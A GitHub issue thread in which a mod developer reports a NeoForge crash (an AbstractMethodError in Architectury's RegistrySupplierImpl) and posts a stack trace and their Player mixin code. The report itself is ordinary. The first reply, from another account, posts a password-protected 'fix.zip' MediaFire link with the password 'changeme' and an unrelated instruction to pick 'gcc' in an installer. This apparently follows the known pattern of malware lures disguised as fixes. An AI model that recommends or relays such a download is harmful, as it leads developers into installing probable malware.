### ISSUE TITLE
When Neoforge client loads a world (with my mod) in 1.21.1, the game crashes. But when using Fabric, there won't be this bug (I wrote code in "common")

### ISSUE THREAD

**Issue by Terry-mcgit** [architectury/architectury-api#554]
### My mother language isn't English. Don't mind my spelling or grammar

Just like the title.
When I use Fabric(client) to load a world(with my mod), there aren't any bugs.
But when I use Neoforge(client) to load a world(with my mod), the game crashed.
Here is the main error: `Caused by: java.lang.AbstractMethodError: Receiver class dev.architectury.registry.registries.DeferredRegister$Entry does not define or inherit an implementation of the resolved method 'net.minecraft.resources.ResourceKey getKey()' of interface dev.architectury.impl.RegistrySupplierImpl.`
(I mixined tick() in Player, and my code is under the report)
Error Report:
```
Time: 2024-08-28 17:51:25
Description: Ticking entity

java.lang.AbstractMethodError: Receiver class dev.architectury.registry.registries.DeferredRegister$Entry does not define or inherit an implementation of the resolved method 'net.minecraft.resources.ResourceKey getKey()' of interface dev.architectury.impl.RegistrySupplierImpl.
	at TRANSFORMER/architectury@13.0.6/dev.architectury.impl.RegistrySupplierImpl.is(RegistrySupplierImpl.java:74) ~[architectury-neoforge-13.0.6.jar%23195!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.player.LocalPlayer.removeEffectNoUpdate(LocalPlayer.java:903) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:computing_frames,pl:accesstransformer:B,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.entity.LivingEntity.removeEffect(LivingEntity.java:1015) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:computing_frames,pl:accesstransformer:B,pl:unprotect:A,re:mixin,pl:accesstransformer:B,pl:unprotect:A,re:classloading,pl:accesstransformer:B,pl:unprotect:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.entity.player.Player.handler$zzk000$notshowing$tickMixin(Player.java:2450) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:accesstransformer:B,pl:unprotect:A,re:classloading,pl:accesstransformer:B,pl:mixin:APP:notshowing.mixins.json:PlayerMixin from mod notshowing,pl:mixin:A,pl:unprotect:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.entity.player.Player.tick(Player.java:333) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:accesstransformer:B,pl:unprotect:A,re:classloading,pl:accesstransformer:B,pl:mixin:APP:notshowing.mixins.json:PlayerMixin from mod notshowing,pl:mixin:A,pl:unprotect:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.player.AbstractClientPlayer.tick(AbstractClientPlayer.java:59) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:computing_frames,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.player.LocalPlayer.tick(LocalPlayer.java:204) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:computing_frames,pl:accesstransformer:B,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.multiplayer.ClientLevel.tickNonPassenger(ClientLevel.java:296) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:APP:architectury.mixins.json:MixinClientLevel from mod architectury,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.level.Level.guardEntityTick(Level.java:570) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:computing_frames,pl:accesstransformer:B,pl:unprotect:A,re:mixin,pl:accesstransformer:B,pl:unprotect:A,re:classloading,pl:accesstransformer:B,pl:unprotect:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.multiplayer.ClientLevel.method_32124(ClientLevel.java:278) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:APP:architectury.mixins.json:MixinClientLevel from mod architectury,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.world.level.entity.EntityTickList.forEach(EntityTickList.java:54) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:classloading}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.multiplayer.ClientLevel.tickEntities(ClientLevel.java:276) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:APP:architectury.mixins.json:MixinClientLevel from mod architectury,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.Minecraft.tick(Minecraft.java:1856) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.Minecraft.runTick(Minecraft.java:1161) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.Minecraft.run(Minecraft.java:807) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:mixin,pl:unprotect:A,pl:runtimedistcleaner:A,re:classloading,pl:mixin:A,pl:unprotect:A,pl:runtimedistcleaner:A}
	at TRANSFORMER/minecraft@1.21.1/net.minecraft.client.main.Main.main(Main.java:230) ~[neoforge-21.1.22-minecraft-merged-1.21.1-loom.mappings.1_21_1.layered+hash.40545-v2-neoforge-21.1.22.jar%23191!/:?] {re:classloading,pl:unprotect:A,pl:runtimedistcleaner:A}
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103) ~[?:?] {}
	at java.base/java.lang.reflect.Method.invoke(Method.java:580) ~[?:?] {}
	at MC-BOOTSTRAP/fml_loader@4.0.24/net.neoforged.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:136) ~[loader-4.0.24.jar%23104!/:4.0] {}
	at MC-BOOTSTRAP/fml_loader@4.0.24/net.neoforged.fml.loading.targets.CommonLaunchHandler.clientService(CommonLaunchHandler.java:124) ~[loader-4.0.24.jar%23104!/:4.0] {}
	at MC-BOOTSTRAP/fml_loader@4.0.24/net.neoforged.fml.loading.targets.NeoForgeClientUserdevLaunchHandler.runService(NeoForgeClientUserdevLaunchHandler.java:23) ~[loader-4.0.24.jar%23104!/:4.0] {}
	at MC-BOOTSTRAP/fml_loader@4.0.24/net.neoforged.fml.loading.targets.CommonLaunchHandler.lambda$launchService$4(CommonLaunchHandler.java:118) ~[loader-4.0.24.jar%23104!/:4.0] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:30) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:53) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:71) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.Launcher.run(Launcher.java:103) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.Launcher.main(Launcher.java:74) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:26) [modlauncher-11.0.4.jar%23106!/:?] {}
	at MC-BOOTSTRAP/cpw.mods.modlauncher@11.0.4/cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:23) [modlauncher-11.0.4.jar%23106!/:?] {}
	at cpw.mods.bootstraplauncher.BootstrapLauncher.run(BootstrapLauncher.java:210) [bootstraplauncher-2.0.2.jar:?] {}
	at cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:69) [bootstraplauncher-2.0.2.jar:?] {}
	at net.fabricmc.devlaunchinjector.Main.main(Main.java:86) [dev-launch-injector-0.2.1+build.8.jar:?] {}
	at dev.architectury.transformer.TransformerRuntime.main(TransformerRuntime.java:220) [architectury-transformer-5.2.87-runtime.jar:5.2.87] {}
```
My Player Mixin Code(I'm not good at coding):
```java

import notshowing.effect.ModEffect;
import notshowing.pubilc_interface.IFoodDataManager;
import notshowing.pubilc_interface.IMaxFoodLevel;
import net.minecraft.core.Holder;
import net.minecraft.world.effect.MobEffect;
import net.minecraft.world.effect.MobEffectInstance;
import net.minecraft.world.entity.Entity;
import net.minecraft.world.entity.EntityType;
import net.minecraft.world.entity.LivingEntity;
import net.minecraft.world.entity.ai.attributes.Attributes;
import net.minecraft.world.entity.player.Player;
import net.minecraft.world.food.FoodData;
import net.minecraft.world.level.Level;
import org.slf4j.Logger;
import org.spongepowered.asm.mixin.Final;
import org.spongepowered.asm.mixin.Mixin;
import org.spongepowered.asm.mixin.Shadow;
import org.spongepowered.asm.mixin.injection.At;
import org.spongepowered.asm.mixin.injection.Inject;
import org.spongepowered.asm.mixin.injection.ModifyArg;
import org.spongepowered.asm.mixin.injection.callback.CallbackInfo;
import org.spongepowered.asm.mixin.injection.callback.CallbackInfoReturnable;

@Mixin(Player.class)
public abstract class PlayerMixin extends LivingEntity implements IFoodDataManager {
    @Shadow public int experienceLevel;

    @Shadow protected FoodData foodData;

    @Shadow public abstract FoodData getFoodData();

    @Shadow @Final private static Logger LOGGER;

    protected PlayerMixin(EntityType<? extends LivingEntity> entityType, Level level) {
        super(entityType, level);
    }

    @Inject(method = "tick", at = @At("TAIL"))
    public void tickMixin(CallbackInfo ci){
        ((IMaxFoodLevel)foodData).setMaxFoodLevel(Math.min(20,6+experienceLevel/5*2));
        ((IFoodDataManager)foodData).get().setIsl(((IFoodDataManager)foodData).get().getIsl()-1);
        ((IFoodDataManager)foodData).get().setPtt(((IFoodDataManager)foodData).get().getPtt()-1);
        ((IFoodDataManager)foodData).get().setPtn(((IFoodDataManager)foodData).get().getPtn()-1);
        this.getAttributes().getInstance(Attributes.MAX_HEALTH).setBaseValue(Math.min(20,6+experienceLevel/5*2));
        this.getAttributes().getInstance(Attributes.BLOCK_BREAK_SPEED).setBaseValue(1+0.02*experienceLevel);
        foodData.setFoodLevel(Math.min(foodData.getFoodLevel(),((IMaxFoodLevel)foodData).getMaxFoodLevel()));
        if(foodData.getFoodLevel()==0F){
            this.setSpeed(0.08F);
        }
        else{
            this.setSpeed(0.1F);
        }
        int isl=((IFoodDataManager)foodData).get().getIsl();
        boolean hasInsulinRes=this.hasEffect((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE);
        MobEffectInstance getInsulinRes=hasInsulinRes?this.getEffect((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE):null;
        if(isl>=48000&&isl<96000) {
            if((!hasInsulinRes||getInsulinRes.getAmplifier()!=0)){
                this.removeEffect((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE);
                this.forceAddEffect(new MobEffectInstance((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE,((IFoodDataManager)foodData).get().getIsl()),this);
            }
        } else if (isl>=96000&&isl<144000) {
            if((!hasInsulinRes||getInsulinRes.getAmplifier()!=1)){
                this.removeEffect((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE);
                this.forceAddEffect(new MobEffectInstance((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE,((IFoodDataManager)foodData).get().getIsl(),1),this);
            }
        } else if (isl>=144000){
            if((!hasInsulinRes||getInsulinRes.getAmplifier()!=2)){
                this.removeEffect((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE);
                this.forceAddEffect(new MobEffectInstance((Holder<MobEffect>) ModEffect.INSULIN_RESISTANCE,((IFoodDataManager)foodData).get().getIsl(),2),this);
            }
        }
        int ptt=((IFoodDataManager)foodData).get().getPtt(),ptn=((IFoodDataManager)foodData).get().getPtn();
        boolean hasMalnourished=this.hasEffect((Holder<MobEffect>) ModEffect.MALNOURISHED);
        if(ptt<=(int)(160000*0.05)||ptn<=(int)(160000*0.05)){
            if(!hasMalnourished){
                this.forceAddEffect(new MobEffectInstance((Holder<MobEffect>) ModEffect.MALNOURISHED, MobEffectInstance.INFINITE_DURATION),this);
            }
        }
        else{
            if(!hasMalnourished) {
                this.removeEffect((Holder<MobEffect>) ModEffect.MALNOURISHED);
            }
        }
    }

    @Inject(method = "getXpNeededForNextLevel",at = @At("HEAD"),cancellable = true)
    public void getXpNeededMixin(CallbackInfoReturnable<Integer> cir){
        if(this.experienceLevel>=200){
            this.experienceLevel=200;
            cir.setReturnValue(Integer.MAX_VALUE);
        }
        else cir.setReturnValue(10*(this.experienceLevel+1));
    }

    @Inject(method = "aiStep", at = @At("HEAD"))
    public void aiStepMixin(CallbackInfo ci){
        if(this.tickCount%(64*20)==0&&this.foodData.getFoodLevel()>=((IMaxFoodLevel)this.foodData).getMaxFoodLevel()*0.5&&!this.hasEffect(ModEffect.MALNOURISHED)){
            this.heal(1.0F);
        }
        else if(this.tickCount%(256*20)==0&&this.foodData.getFoodLevel()>=((IMaxFoodLevel)this.foodData).getMaxFoodLevel()*0.5&&this.hasEffect(ModEffect.MALNOURISHED)){
            this.heal(1.0F);
        }
    }

    @ModifyArg(method = "aiStep", at = @At(value = "INVOKE", target = "Lnet/minecraft/world/entity/player/Player;heal(F)V"),index = 0)
    public float aiStepMixin2(float par1){
        return 0.0F;
    }

    @Inject(method = "attack" ,at = @At("HEAD"),cancellable = true)
    public void attackMixin(Entity entity, CallbackInfo ci){
        if (this.getHealth() <= 1.0F) {
            ci.cancel();
        }
        if (this.getFoodData().getFoodLevel() <= 0) {
            ci.cancel();
        }
    }

    @ModifyArg(method = "attack", at = @At(value = "INVOKE", target = "Lnet/minecraft/world/entity/Entity;hurt(Lnet/minecraft/world/damagesource/DamageSource;F)Z"),index = 1)
    public float attackMixin2(float f){
        return (float)(f*0.005*this.experienceLevel);
    }
}
```

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Terry-mcgit** [comment]
I did install gcc on my computer

**Comment by Terry-mcgit** [comment]
I installed gcc in my computer before
